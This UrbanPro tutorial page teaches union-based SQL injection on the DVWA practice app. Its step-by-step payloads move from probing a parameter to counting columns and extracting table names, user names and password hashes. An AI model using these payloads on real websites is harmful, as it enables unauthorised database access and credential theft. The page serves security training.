Find the best tutors and institutes for Ethical Hacking

Find Ethical Hacking Tutors & Institutes

Please select a Category.

Please select a Locality.

No matching category found.

No matching Locality found.

Outside India?

Search for topics

Union Based SQL Injection | DVWA (Legal)

Palvinder Singh
11 Jan 0 0

Union Based Injection:

Technology: php
Database: Mysql

The main objective of this injection is to access database, of the website, by just given some malicious sql inputs in front end and get an access of the backend of the website i.e there database (Username/Password).

DVWA: Damnn Vulnerable Web Application:
A legal application, for security proffesionals to test their skills in some legal platforms.

Union Based Sql Injection:

Dvwa: Low Level

Step 1: Find GET Method on website

url:

?id=1
?pid=98765
?clothes=jean
?product=ilk

?Something=something

By trying, every possible option on website i.e search, links, submit, help etc

Step 2: Try or Check for Exception Handling

?id=2'

try inverted comma('), after value of get method

Result:
If any sql error is there, images missing, content corrupted etc
=> Website is vulnerable for SQL Injection


Step 3: Check No. of Column: "order by"


id=2' order by 1--+   ==> Normal result
id=2' order by 2--+   ==> Normal result
id=2' order by 3--+   ==> Normal result
id=2' order by 4--+   ==> Normal result
id=2' order by 5--+   ==> error

So, No. of column = 4

Step 4: Check for vulnerable column no. among (1,2,3,4)

id=2' union select 1,2,3,4--+

Result= 2/3/1/4

This will show some random number on screen, that no. will be vulnerable for further injection

Step 5: Get name of database

database()

id=2' union select 1,database(),3,4--+  

Step 6: Get version of database

version()

id=2' union select 1,version(),3,4--+  

Step 7: Get list of tables

id=2' union select 1,table_name,3,4 from information_schema.tables--+  

Result: Will list all tables and we have to select those table name, which seems to be having sensitive information

admin
users
login
passwrds
credit
debit
card_details
..
..
etc

Step 8: Get Columns of selected table

id=2' union select 1,column_name,3,4 from information_schema.columns where table_name="users"--+

Result: user,password

Step 9: Get Data of respected column names

id=2' union select 1,user,3,4 from users--+

Result: This

id=2' union select 1,passowrd,3,4 from users--+

md5 encrypted password.

0 Dislike
Follow 2

Please Enter a comment

Submit

Other Lessons for You

An Introduction to Backdooring
In the hacking world, backdooring is the way to control a computer remotely. An attacker would trick to install a piece of software which has a backdoor in it on the victim and as soon as he installs it,...
Prerequisites To Get Started Into Ethical Hacking
Getting into ethical hacking as a beginner, one has confusion about where to start. There are many resources but the only question remains in mind for a beginner is "What is the zero level to start?"....
Ethical Hacking : Important Points for Beginners
Dear passionate learners,I am posting lesson to create enthusiasm among you all for learning ethical hacking.A beginner in Ethical Hacking is always in a dilemma. Below are some misconceptions, which...

WiTTyMinds | 16 May

0 0
0
Ethical hacking : Important points for beginners
Dear passionate learners, I am posting lesson to create enthusiasm among you all for learning ethical hacking. A beginner in Ethical Hacking is always in a dilemma. Below are some misconceptions,...

Abhay | 16 May

0 0
0
Ethical hacking : Important points for beginners
Dear passionate learners, I am posting below lesson to create enthusiasm among you all for learning ethical hacking . A beginner in Ethical Hacking is always in dilemma. Below are some misconceptions,...

WiTTyMinds | 16 May

0 0
0

Looking for Ethical Hacking Training?

Find best Ethical Hacking Training in your locality on UrbanPro.

Are you a Tutor or Training Institute?

Join UrbanPro Today to find students near you
Sponsored

Find Best Ethical Hacking Training?

Find Now »

UrbanPro.com is India's largest network of most trusted tutors and institutes. Over 25 lakh students rely on UrbanPro.com, to fulfill their learning requirements across 1,000+ categories. Using UrbanPro.com, parents, and students can compare multiple Tutors and Institutes and choose the one that best suits their requirements. More than 6.5 lakh verified Tutors and Institutes are helping millions of students every day and growing their tutoring business on UrbanPro.com. Whether you are looking for a tutor to learn mathematics, a German language trainer to brush up your German language skills or an institute to upgrade your IT skills, we have got the best selection of Tutors and Training Institutes for you. Read more